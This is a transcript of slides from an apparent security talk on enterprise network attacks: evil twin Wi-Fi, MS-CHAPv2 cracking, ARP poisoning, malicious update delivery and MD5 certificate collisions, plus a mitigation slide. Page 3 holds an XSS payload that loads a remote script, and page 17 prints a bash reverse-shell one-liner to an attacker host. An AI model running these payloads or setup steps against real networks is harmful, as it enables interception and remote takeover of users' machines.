Breaking Bad: Enterprise Network Security


Transcript of Breaking Bad: Enterprise Network Security

Page 1: Breaking Bad: Enterprise Network Security

Enterprise Network Security

Navneet Kumar

Page 2: Breaking Bad: Enterprise Network Security

Overview

• Demo
• OSI Protocols Overview
• Evil Twin Attack
• Cryptanalysis: MS-CHAPv2
• ARP poisoning
• POST-MITM Attack vectors
• Reverse Shell
• Mitigations
• Certificate Collision Attack

Note: Some images in this presentation have been taken from the web for illustration

Page 3: Breaking Bad: Enterprise Network Security

SilverFish Worm

XSS

NPAPI runtime

Shell

<img src='a' onerror=eval(atob('JC5'))> = $.getScript('https://goo.gl/zByVrM')

masterPlugin.updatePlugin(“attacker-plugin”,success,failure)

Netcat Shell / ssh daemon / Bonjour

Hatching rate = n^g

n = average # of endpoints per meeting
g = # of generation

g=0

g=1

g=2

Page 4: Breaking Bad: Enterprise Network Security

802.11

ARP

Target Protocols

Attack Vectors

Page 5: Breaking Bad: Enterprise Network Security

802.11

Page 6: Breaking Bad: Enterprise Network Security

Evil twin attack

Page 7: Breaking Bad: Enterprise Network Security

Fake Certificate Exchange

Page 8: Breaking Bad: Enterprise Network Security

Soft AP

• Put WNIC in Master Mode and use forged CA cert
• Configure AP SSID to "bjn-int"
• Deauth to actual AP

Network

• Setup DNS
• Setup DHCP

Routing

• Redirect 80,443 packets to proxy port
• Forward traffic after NAT

Capture

• Use same CA cert for signing
• Sniff in proxy

Attack Setup

Note: Chrome uses certificate pinning for *.google.com

Page 9: Breaking Bad: Enterprise Network Security

Fake BSSID

Highest Strength / 2.4 GHz Channel

Wireless Scan

Page 10: Breaking Bad: Enterprise Network Security

Victim’s Client

Page 11: Breaking Bad: Enterprise Network Security

WTF !!!

Certificate Forgery

Page 12: Breaking Bad: Enterprise Network Security

Soft AP DHCP

Routing Proxy

Page 13: Breaking Bad: Enterprise Network Security

Cryptanalysis of MS-CHAPv2

ChallengeHash = SHA1(random || username)[0:8]

ChallengeHash

ChallengeResponse

Note: Original complexity analysis has been done by Moxie Marlinspike

Page 14: Breaking Bad: Enterprise Network Security

Cryptanalysis of MS-CHAPv2

Note: Original complexity analysis has been done by Moxie Marlinspike

7 bytes | 7 bytes | 2 bytes

Complexity = 2^56

time < 24 hrs ( 100% success )

Page 15: Breaking Bad: Enterprise Network Security

ARP poisoning

Page 16: Breaking Bad: Enterprise Network Security

POST-MITM Attack Vectors

Reverse Shell

Bind Shell

Session Hijacking

Above L3 Attacks

Page 17: Breaking Bad: Enterprise Network Security

Reverse Bind Shell

• Give a network shell to attacker
• Works behind NAT
• Gets root access

HOW ????

$ bash -i >& /dev/tcp/<attacker-ip>/5555 0>&1

Page 18: Breaking Bad: Enterprise Network Security

https://tools.google.com/service/update2

https://swdl.bluejeans.com

https://aus4.mozilla.org/update/*/update.xml

smb://MVAV01/SophosUpdate

(Auto)Updates

Deploy Payload with updates

Page 19: Breaking Bad: Enterprise Network Security

Mitigation

Pre-deployment of enterprise wide CA

SSL Cert Pinning for updates

Proper WIPS Configuration

ARP Spoof Mitigations

Careful CA signing

Page 20: Breaking Bad: Enterprise Network Security

Certificate Collision Attack

[Diagram: CA and DomainA; isCA? check; CSR carrying E_key[SHA(csr.tbs)]; Certificate built from CSR.TBS; SHA(domainA.csr) vs SHA(domainB.csr); md5(domainA.csr) vs md5(domainB.csr); outcomes labelled True / False]

MD5 Collision -> Certificate Collision

Page 21: Breaking Bad: Enterprise Network Security